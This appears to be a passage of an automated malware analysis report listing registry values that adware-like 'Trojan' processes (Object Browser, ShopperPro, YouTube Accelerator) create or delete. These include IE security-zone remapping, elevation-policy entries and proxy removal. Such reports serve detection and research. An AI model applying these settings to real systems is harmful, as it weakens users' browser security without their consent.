[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Gcf" = "13 55 76 20 38 04 10 95 36 B2 FC 31 D7 76 D6 8B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The process smu.exe:2884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 27 32 24 81 B0 FC 33 D9 F6 BC 6E B2 D2 E7 AF"

[HKLM\SOFTWARE\SearchModule\SMUpd\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Rlt" = "Type: REG_QWORD, Length: 8"
"Scf" = "DF BC A0 3D 31 49 10 C8 A2 BC 71 89 44 E2 DF D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\SearchModule\SMUpd\Users\Default]
"Spt" = "0E 67 60 5E E3 C9 4E D4 C3 0C 82 C4 22 7A B0 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Gcf" = "34 73 66 F1 CF 76 AE CE 04 45 9E B8 B7 CD B8 C6"

The process 34d16228-9e90-4879-9804-8e38b5180d78-4.exe:4036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 D2 A2 83 67 D2 C2 7E B7 29 20 C3 8F C0 91 83"

The process Ecixv.exe:3048 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Object Browser]
"CrAppId" = "32850"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\AccDownload.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1B.tmp\extensionData\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Object Browser]
"UninstallString" = "%Program Files%\Object Browser\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a6c457b1-1109-47aa-a546-1d90f40b83a0}]
"AppPath" = "%Program Files%\Object Browser"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a6c457b1-1109-47aa-a546-1d90f40b83a0}]
"AppName" = "Object Browser-codedownloader.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Object Browser]
"DisplayIcon" = "%Program Files%\Object Browser\utils.exe"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{a411beaa-c1b6-41c1-96de-301c4c62f5ad}]
"Name" = "Object Browser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fa691310-c0b9-4912-986d-7878b73f0314}]
"AppName" = "Object Browser-bg.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fa691310-c0b9-4912-986d-7878b73f0314}]
"Policy" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fa691310-c0b9-4912-986d-7878b73f0314}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Object Browser]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\InstalledBrowserExtensions\Object Browser]
"32850" = "Object Browser"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Object Browser-bg.exe" = "8000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a6c457b1-1109-47aa-a546-1d90f40b83a0}]
"AppName" = "Object Browser-codedownloader.exe"

[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a6c457b1-1109-47aa-a546-1d90f40b83a0}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Object Browser\Installer]
"BundledFirefox" = "1"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{a411beaa-c1b6-41c1-96de-301c4c62f5ad}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Object Browser]
"Publisher" = "Object Browser"

[HKCU\Software\InstalledBrowserExtensions\20891]
"32850" = "Object Browser"

[HKLM\SOFTWARE\Object Browser\Installer]
"BundledIe" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ad835806-3c0d-4407-8194-ce895a0e9a7c}]
"AppPath" = "%Program Files%\Object Browser"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{a411beaa-c1b6-41c1-96de-301c4c62f5ad}]
"Verifier" = "1121c510e5f38d154df47b19458d540e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fa691310-c0b9-4912-986d-7878b73f0314}]
"AppPath" = "%Program Files%\Object Browser"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a6c457b1-1109-47aa-a546-1d90f40b83a0}]
"AppPath" = "%Program Files%\Object Browser"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ad835806-3c0d-4407-8194-ce895a0e9a7c}]
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Object Browser]
"DisplayName" = "Object Browser"
"DisplayVersion" = "1.34.5.12"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a6c457b1-1109-47aa-a546-1d90f40b83a0}]
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{a411beaa-c1b6-41c1-96de-301c4c62f5ad}]
"srcid_var" = "000046"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fa691310-c0b9-4912-986d-7878b73f0314}]
"AppPath" = "%Program Files%\Object Browser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 D0 5F 2E 7A 8D 77 C2 33 5A 06 CE 99 CE F0 9E"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ad835806-3c0d-4407-8194-ce895a0e9a7c}]
"AppName" = "Object Browser-buttonutil.exe"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{a411beaa-c1b6-41c1-96de-301c4c62f5ad}]
"Bic" = "7F1D95218D1E4CF487AAD4B2A3E48467IE"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ad835806-3c0d-4407-8194-ce895a0e9a7c}]
"AppPath" = "%Program Files%\Object Browser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ad835806-3c0d-4407-8194-ce895a0e9a7c}]
"Policy" = "3"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"32850" = "Object Browser"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ad835806-3c0d-4407-8194-ce895a0e9a7c}]
"AppName" = "Object Browser-buttonutil.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fa691310-c0b9-4912-986d-7878b73f0314}]
"AppName" = "Object Browser-bg.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process shopperpro.exe:2524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 68 8F EC B2 36 7B 8A 9B 33 E9 18 F1 07 B7 F1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\AccDownload.dll,"

The process iwebar-buttonutil.exe:3200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 54 A5 A4 5C DB 6F 5C FD 9A 88 9A 2A E2 24 59"

[HKCU\Software\iWebar\Log]
"iwebar-buttonutil" = "0"

The process sense.exe:3392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 21 15 A1 35 89 79 D4 0F 11 B1 12 BB 2E BC 68"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process YouTubeAcceleratorService.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 C8 03 03 5C 21 3B B9 9F FF 24 F8 6A 2A FB 60"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKLM\SOFTWARE\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
"{I3B3ED09D712B0615}" = "04 00 00 00"

The process YouTubeAcceleratorService.exe:2332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 25 F8 EA E8 6E BD 4F C5 AF FC 86 3D 2C 18 53"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKLM\SOFTWARE\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
"{I3B3ED09D712B0615}" = "07 00 00 00"

The process YouTubeAcceleratorService.exe:2516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "3"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"LSPTestSucceeded" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"VA_Aff" = "NONE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBAID" = "9714b281-04df-4f52-935d-f743d52795b5"
"SBPPW" = "oCQOL84Q"

[HKLM\SOFTWARE\Wow6432Node\GOOBZO\YouTube Accelerator]
"LspVersion" = "1.0.0.1"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TimeLimit" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBAIDV" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"XMLUpdateFailed" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBAPW" = "YcRnhe0a"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TracerDoBackup" = "1"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"LspVersion" = "1.0.0.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBPIDV" = "0"

[HKU\.DEFAULT\Software\GOOBZO\YouTube Accelerator]
"LastUpdateTime" = "1401908134"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 A7 90 10 75 AF CD CC E9 DA 5B 47 42 C0 70 AB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TraceFolder" = "%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"resver" = "1.0.0.8"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"XMLVersion" = "0"

[HKLM\SOFTWARE\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
"{I3B3ED09D712B0615}" = "09 00 00 00"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TimeStamp" = "1401908133"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBPID" = "335e88be-0c5e-4ba6-851b-e652ba3e6ba3"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"LSPTestSucceeded" = "1"

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]
"UpdateReason" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process YouTubeAcceleratorService.exe:1952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 0B FB 56 A3 52 DB 07 32 A2 D3 ED AF 7D A6 C2"

[HKLM\SOFTWARE\Licenses]
"{K7C0DB872A3F777C0}" = "6A ED 91 F4 01 16 1F 05 48 6E 02 90 27 91 BF B9"

[HKCR\CLSID\{75AE1612-5F30-A998-2958-8910A059B8E1}\TreatAs]
"(Default)" = "{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBB}"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "0"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKLM\SOFTWARE\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
"{I3B3ED09D712B0615}" = "01 00 00 00"
"{R7C0DB872A3F777C0}" = "4A 8D 7D 4C"

The Trojan deletes the following value(s) in system registry:

[HKCR\CLSID\{75AE1612-5F30-A998-2958-8910A059B8E1}]
"0"

The process GLB12.tmp:3040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Goobzo\YouTube Accelerator]
"InstallTime" = "1401908097"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Goobzo\YouTube Accelerator]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"URLInfoAbout" = "http://www.youtubeaccelerator.com/support/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls\%System%]
"AniGIF.ocx" = "1"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"ShowAds" = "1"

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowTrayMessage" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"ZippedRules" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"DisplayIcon" = "%Program Files%\YouTube Accelerator\YouTubeAccelerator.exe,-0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&LangID=x&Ext=%s"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"DllInstall" = "%Program Files%\YouTube Accelerator\"
"InstallTime" = "1401908097"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Goobzo\YouTube Accelerator]
"BuildNumber" = "80"

[HKCU\Software\Goobzo\Language\YouTubeAccelerator\Settings]
"CurrentLanguage" = "1033"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"HelpLink" = "http://www.youtubeaccelerator.com/about/"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"(Default)" = ""

[HKCU\Software\Goobzo\YouTube Accelerator]
"RunFinishInstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Goobzo\YouTube Accelerator]
"LspInstall" = "%Program Files%\YouTube Accelerator\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator]
"Contact" = "[email protected]"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\YouTube Accelerator]
"YouTubeAcceleratorService.exe" = "YouTubeAcceleratorService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&LangID=x&Ext=%s"

